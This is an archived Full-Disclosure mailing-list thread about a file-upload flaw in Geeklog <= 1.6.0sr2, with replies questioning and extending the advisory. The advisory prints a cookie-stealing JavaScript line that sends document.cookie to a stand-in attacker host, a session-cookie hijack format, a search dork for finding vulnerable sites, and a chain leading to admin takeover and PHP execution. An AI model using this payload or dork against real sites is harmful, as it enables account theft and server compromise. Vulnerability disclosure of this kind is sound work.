Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> > >Successful exploitation requires the ability to execute the uploaded JavaScript. > > >The Geeklog Forum program can be used as an attack vector since it does not > >> properly validate many $_GET / $_POST variables. > >Could you give us some more details about these XSS vulnerabilities ? :) >> > >Cause all I see here is a RCE in the admin panel. >> You confirm that there are XSS but we don't have any details about them... >The >easy one is when the forum allows anonymous posts and is configured for >text posts. The anonymous user name is never filtered, so you can put >anything there, including a reference to the javascript uploaded as the >user profile image.. > How about the php flaw? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
On 4 Oct 2009, at 08:47, Jaloh Smith wrote: > The > easy one is when the forum allows anonymous posts and is configured > for > text posts. The anonymous user name is never filtered, so you can put > anything there, including a reference to the javascript uploaded as > the > user profile image.. > > That's actually a much worse exploit than the file upload. There's no reason the script you load has to be stored locally -- it works just as well if you pull it from another domain. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> > > Successful exploitation requires the ability to execute the uploaded > > JavaScript. > > The Geeklog Forum program can be used as an attack vector since it does not > > properly validate many $_GET / $_POST variables. > Could you give us some more details about these XSS vulnerabilities ? :) > > Cause all I see here is a RCE in the admin panel. > You confirm that there are XSS but we don't have any details about them... The easy one is when the forum allows anonymous posts and is configured for text posts. The anonymous user name is never filtered, so you can put anything there, including a reference to the javascript uploaded as the user profile image.. _ Windows Live: Keep your friends up to date with what you do online. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_1:092010___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
> > Files with .jpg extensions can be uploaded, but these file can contain > anything, like javascript or PHP code. Using FireFox you can upload any > jpg extension and it will be accepted since FireFox sets the mime type > based on file extension. > > Uploading usually requires that you first create a user account. Once an > account is created, you can upload a user photo, which could take advantage > of this vulnerability. > Ok so this is not a remote file upload issue if you can only upload allowed files (not files with bad exts), this is just a feature that doesn't valid the mime type. This can help for another exploitation but you can't execute code directly at this point. > Potential Abuse > === > Executable javascript can easily be uploaded. There are several XSS holes in > many of the Geeklog plugins which could run the uploaded javascript. If a > simple > cookie stealing javascript were uploaded, it could be used to expose the > Geeklog > uid and password hash which is as good as having the actual password. > So you just upload a JS file in order to help you with the XSS ? > If you > expose an administrative account, you have full access to the admin panel > where you can set the staticpages.PHP permission to true, then create a > static page that will run any PHP script you desire, potentially exposing > the entire server. > Ok so here you have a remote code execution in the admin panel. > Successful exploitation requires the ability to execute the uploaded > JavaScript. > The Geeklog Forum program can be used as an attack vector since it does not > properly validate many $_GET / $_POST variables. Could you give us some more details about these XSS vulnerabilities ? :) Cause all I see here is a RCE in the admin panel. You confirm that there are XSS but we don't have any details about them... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload
== Geeklog <= v1.6.0sr2 - Remote File Upload Discovered: JaL0h Software Site: http://www.geeklog.net Dork: "By Geeklog" "Created this page in" +seconds +powered == Remote File Upload == Geeklog has several options to upload images. The image upload process does not validate the mime type of the upload. Geeklog trusts the mime type specified by the browser and also checks the file extension, both of which are very easy to spoof. Files with .jpg extensions can be uploaded, but these file can contain anything, like javascript or PHP code. Using FireFox you can upload any jpg extension and it will be accepted since FireFox sets the mime type based on file extension. Uploading usually requires that you first create a user account. Once an account is created, you can upload a user photo, which could take advantage of this vulnerability. Potential Abuse === Executable javascript can easily be uploaded. There are several XSS holes in many of the Geeklog plugins which could run the uploaded javascript. If a simple cookie stealing javascript were uploaded, it could be used to expose the Geeklog uid and password hash which is as good as having the actual password. Sample JavaScript document.write('http://my.cookiestealingsite.com/cs.php?ck=' + document.cookie + '" id="myFrame" frameborder="0" vspace="0" hspace="0" marginwidth="0" marginheight="0" width="0" scrolling="no" height="0" style="visibility:hidden;">'); Once the uid and password hash is known, you can set a cookie in your browser: geeklog=[uid]; password=[md5 hash]; which gives you instant access to everything the user has access to. If you expose an administrative account, you have full access to the admin panel where you can set the staticpages.PHP permission to true, then create a static page that will run any PHP script you desire, potentially exposing the entire server. The cookie exploit was originally documented by Nine:Situations:Group::bookoo http://www.milw0rm.com/exploits/8376 and remains unfixed. Successful exploitation requires the ability to execute the uploaded JavaScript. The Geeklog Forum program can be used as an attack vector since it does not properly validate many $_GET / $_POST variables. _ Windows Live: Make it easier for your friends to see what you’re up to on Facebook. http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_2:092009___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/